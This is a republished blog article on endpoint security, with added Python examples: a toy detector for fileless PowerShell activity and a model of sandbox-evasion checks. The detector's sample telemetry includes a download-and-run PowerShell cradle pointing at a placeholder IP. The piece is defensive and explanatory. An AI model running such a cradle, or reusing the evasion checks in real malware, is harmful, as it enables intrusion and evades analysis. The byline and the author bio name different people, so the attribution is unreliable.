Wednesday, January 27, 2021
Chyper News
Endpoint security: it's a whole new world

by Gary Martin
May 23, 2019
in Cyber Security

Once upon a time, endpoint security was just a hall monitor. It looked for known bad files identified by a simple signature and sent you a notification when the file was blocked. To be safe, it scanned every machine every day, an intrusive activity that slowed machines down and raised the blood pressure of affected users and of the unhappy analysts on the help desk.

Those days are over, my friend. Those days are over. Endpoint security, like all technology, is now orders of magnitude more sophisticated than when it was born. Functions that once looked innovative and forward-leaning are now "table stakes": essential for consideration, and all but universally adopted. Here are some of the basic and not-so-basic functions of modern endpoint security software.

At the top of the list are three sine qua non capabilities:

  1. Zero-day detection (previously unknown malware)
  2. Detection and prevention of memory-based attacks (a.k.a. "fileless" attacks), which execute on an infected machine but never write a file to the victim's disk
  3. The ability to track the processes running on an endpoint and identify "bad", or at least unusual, behavior

If malware somehow slips through the cracks, good endpoint software can and will search every machine in the organization, without interrupting end users, to contain the spread of an infection. Of course, it should generate alerts in response to such events, but it should minimize false positives and provide severity levels and/or comprehensible descriptions of the offending malware. Security staff are notoriously overloaded. They cannot waste time chasing false alarms, and they need to know how to prioritize genuine intrusion alerts.
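As an added illustration (example code written for this page, not code from the original article or from any vendor's product), here is a toy behavioral detector run over constructed process telemetry. It covers the second and third capabilities in the list above and the alerting requirements of the paragraph just read: memory-resident code with no backing file, script hosts spawned by Office or mail clients, and fileless PowerShell command lines each add to a score; a lone weak tell (an unsigned binary) stays below the alert threshold to keep false positives down; and alerts come out graded and sorted by severity so the queue is already prioritized. The field names, heuristics, weights and sample events are all assumptions made for the example, not a real agent's schema.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


# Field names are constructed for this example; real EDR telemetry schemas
# differ, but every field here is something agents commonly record.
@dataclass
class ProcessEvent:
    host: str
    pid: int
    image: str      # executable file name, lower-case
    parent: str     # parent process image, lower-case
    cmdline: str
    on_disk: bool   # False when the image has no backing file (injected or reflectively loaded code)
    signed: bool    # code signature verified


@dataclass
class Alert:
    host: str
    pid: int
    severity: str   # "medium" | "high" | "critical"
    description: str


# Office and mail clients have no business spawning shells or script hosts.
SUSPICIOUS_PARENTS = {
    "powershell.exe": {"winword.exe", "excel.exe", "outlook.exe", "mshta.exe"},
    "cmd.exe": {"winword.exe", "excel.exe", "outlook.exe"},
    "rundll32.exe": {"winword.exe", "excel.exe"},
}

# Command-line tokens typical of fileless PowerShell: encoded commands and
# download-and-run-in-memory cradles.
FILELESS_TOKENS = ("-enc", "-encodedcommand", "iex", "invoke-expression",
                   "downloadstring", "frombase64string")

SEVERITY_RANK = {"medium": 1, "high": 2, "critical": 3}


def score_event(ev: ProcessEvent) -> Tuple[int, List[str]]:
    """Sum independent tells; a single weak tell stays below the alert threshold."""
    score, reasons = 0, []
    if not ev.on_disk:
        score += 4
        reasons.append("image has no backing file on disk (memory-resident code)")
    if ev.parent in SUSPICIOUS_PARENTS.get(ev.image, set()):
        score += 2
        reasons.append(f"{ev.image} spawned by {ev.parent}")
    tokens = set(re.findall(r"[a-z0-9\-]+", ev.cmdline.lower()))
    hits = [t for t in FILELESS_TOKENS if t in tokens]
    if hits:
        score += 3
        reasons.append("fileless PowerShell indicators: " + ", ".join(hits))
    if ev.on_disk and not ev.signed:
        score += 1   # common for legitimate software, so never enough on its own
        reasons.append("unsigned binary")
    return score, reasons


def grade(score: int) -> Optional[str]:
    """Map a score to a severity; None means nobody gets paged."""
    if score >= 5:
        return "critical"
    if score >= 3:
        return "high"
    if score >= 2:
        return "medium"
    return None


def analyze(events: List[ProcessEvent]) -> List[Alert]:
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        severity = grade(score)
        if severity is None:
            continue   # routine activity, or a lone weak tell: no alert
        alerts.append(Alert(ev.host, ev.pid, severity, "; ".join(reasons)))
    # Most severe first, so the analyst's queue is already prioritized
    alerts.sort(key=lambda a: (-SEVERITY_RANK[a.severity], a.host, a.pid))
    return alerts


# Constructed sample telemetry from a handful of hosts (the encoded command
# and the IP address are made up for the example).
SAMPLE_EVENTS = [
    ProcessEvent("ws-017", 1204, "chrome.exe", "explorer.exe",
                 "chrome.exe --profile-directory=Default", True, True),
    ProcessEvent("ws-017", 3320, "powershell.exe", "winword.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA", True, True),
    ProcessEvent("ws-042", 5512, "svchost.exe", "services.exe",
                 "svchost.exe -k netsvcs", False, False),
    ProcessEvent("ws-042", 5610, "updater.exe", "explorer.exe",
                 "updater.exe --check", True, False),
    ProcessEvent("srv-03", 820, "powershell.exe", "outlook.exe",
                 "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')", True, True),
    ProcessEvent("ws-099", 7001, "cmd.exe", "excel.exe", "cmd.exe /c dir", True, True),
]

if __name__ == "__main__":
    for a in analyze(SAMPLE_EVENTS):
        print(f"[{a.severity:8}] {a.host} pid {a.pid}: {a.description}")
```

Run as a script it prints four alerts: two critical (Word and Outlook each launching PowerShell with a fileless cradle), one high (an unbacked svchost.exe image) and one medium (Excel launching cmd.exe). The unsigned updater on ws-042 is scored but never surfaces, which is the false-positive budget the paragraph asks for; in a real deployment that score would still be kept as context for the next tell on the same host.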

To quote John Donne: "No man is an island." The same applies to endpoint protection, and in fact to every type of cyber security tool. Endpoint protection systems must feed their findings to other systems such as SIEMs and threat-intelligence sharing platforms, and must ingest data from multiple sources. Automatically quarantining infected machines is also essential, as is the ability to detonate malware on virtual machines, or even on dedicated hardware, without tipping the malware off that it is running in a "sandbox". Endpoint security systems must also protect themselves by detecting and reporting attempts to remove them.

Finally, endpoint security systems can assist the user or system administrator by guiding them through remediation, offering suggestions and practical tips along the way.

So much for the "table stakes", which are already quite advanced. What are some of the (for now) advanced features of a modern endpoint security system? There are many, limited only by the ingenuity and expertise of the developers.

Automated vulnerability shielding, also known as virtual patching, is crucial, along with the ability to send suspicious malware to a dedicated sandbox machine to observe its behavior. In the endless cat-and-mouse game between defenders and attackers, attackers have learned to write malware that detects when it is in a sandbox, declines to detonate, and sits there doing nothing with an innocent look on its face. Endpoint vendors, in turn, can tell when malware has recognized a detonation chamber and can still make it detonate. This game can continue ad infinitum, so the ability to route a sample to a physical, dedicated detonation sandbox is clearly useful: real hardware avoids the virtualization tells that such malware looks for. At the other end of the spectrum there is the option of spinning up a miniature VM on the endpoint itself and detonating the malware there, directly but harmlessly.
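The cat-and-mouse game above, in miniature, as an added example (written for this page; it is not code from the article, from any malware family or from any sandbox product). A sandbox-aware sample refuses to run unless the machine looks like a real user's workstation; the analyst's environment answers those questions with realistic values and, just as importantly, records which questions were asked, so the sample reveals that it is evasive even when it stays dormant. The environment fields, the thresholds the sample uses and both sandbox profiles are assumptions constructed for the example; the hypervisor MAC prefixes are the well-known VMware and VirtualBox OUIs.

```python
from dataclasses import dataclass
from typing import Any, Callable, Dict, List


@dataclass
class Environment:
    """What a sample can observe about the machine it landed on (constructed fields)."""
    cpu_count: int
    ram_gb: int
    uptime_minutes: int
    mac_prefix: str        # first three octets of the primary NIC, lower-case
    recent_documents: int  # entries in the user's recent-files list
    mouse_moved: bool      # any pointer movement since the sample started


# OUI prefixes of common hypervisor virtual NICs (VMware, VirtualBox)
VM_MAC_PREFIXES = {"00:0c:29", "00:50:56", "08:00:27"}


class Probe:
    """Sits between the sample and the environment and records every attribute
    the sample reads. A sample that asks about core count, uptime or mouse
    movement before doing anything else is telling on itself."""

    def __init__(self, env: Environment):
        self._env = env
        self.queried: List[str] = []

    def __getattr__(self, name: str) -> Any:
        # Only reached for names not set on the Probe itself, i.e. environment fields
        self.queried.append(name)
        return getattr(self._env, name)


def evasive_sample(env: Any) -> bool:
    """Models a sandbox-aware sample: returns True only if it decides to detonate.
    Each check is a classic sandbox tell; the first one that fires sends the
    sample into its innocent-looking dormant mode. Thresholds are assumptions."""
    if env.cpu_count < 2:
        return False
    if env.ram_gb < 4:
        return False
    if env.uptime_minutes < 10:
        return False
    if env.mac_prefix in VM_MAC_PREFIXES:
        return False
    if env.recent_documents < 5:
        return False
    if not env.mouse_moved:
        return False
    return True


def naive_sample(env: Any) -> bool:
    """A sample with no evasion logic: it runs wherever it lands."""
    return True


def detonate(env: Environment, sample: Callable[[Any], bool]) -> Dict[str, Any]:
    """Run a sample against an instrumented environment and report what it did."""
    probe = Probe(env)
    ran = sample(probe)
    return {
        "detonated": ran,
        "sandbox_aware": bool(probe.queried),   # it fingerprinted the host first
        "probes": list(probe.queried),
    }


# A minimal VM that fails every check (constructed)
BARE_SANDBOX = Environment(cpu_count=1, ram_gb=2, uptime_minutes=3,
                           mac_prefix="00:0c:29", recent_documents=0, mouse_moved=False)

# A hardened VM, or real hardware, dressed up as a well-used workstation
# (constructed; the MAC prefix is simply any value outside VM_MAC_PREFIXES)
HARDENED_SANDBOX = Environment(cpu_count=4, ram_gb=16, uptime_minutes=610,
                               mac_prefix="a4:5e:60", recent_documents=27, mouse_moved=True)

if __name__ == "__main__":
    for label, env in (("bare", BARE_SANDBOX), ("hardened", HARDENED_SANDBOX)):
        print(label, detonate(env, evasive_sample))
    print("naive", detonate(BARE_SANDBOX, naive_sample))
```

In the bare sandbox the evasive sample stops at its very first probe and never detonates, but the probe log already marks it as sandbox-aware, which is worth an alert on its own. In the hardened environment the same sample asks all six questions, gets plausible answers, and detonates, which is the forced-detonation outcome the paragraph describes; a physical detonation box gives the same result without having to fake anything. The naive sample detonates anywhere and queries nothing.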

Many organizations use deception technology, also known as "honeypots" or "honeynets." Advanced endpoint software can route malware to a decoy network or system, delaying the attack and allowing defenders to analyze it without fear of compromising production data or machines. A good system can also help the harried security team with response and recovery recommendations, and help identify the attackers.

Security companies innovate every day, so there are many capabilities I have not mentioned here, including ones still under development or not yet conceived. Endpoint protection: it is a whole new world.


About the author: As Chief Cyber ​​Security Technologist for DLT, Don Maclean formulates and implements cyber security portfolio strategy, speaks and writes about security issues and socializes the cyber security portfolio of his company. Don has nearly 30 years of experience with US federal agencies.

Prior to joining DLT in 2015, Don managed security programs for numerous US federal customers, including DOJ, DOL, FAA, FBI and the Treasury Department. This experience enabled him to work closely with the NIST Risk Management Framework described in this article and to understand its strengths and weaknesses. In addition to his CISSP, PMP, CEH and CCSK certifications, Don holds a B.A. in music from Oberlin and an M.S. in Information Security from the Brandeis Rabb School, and is nearing completion of his second bachelor's degree, in mathematics.

Publisher's note: The opinions expressed in this article about the guest authors are solely those of the author and do not necessarily reflect those of Tripwire, Inc.

© 2019 Chypernews.
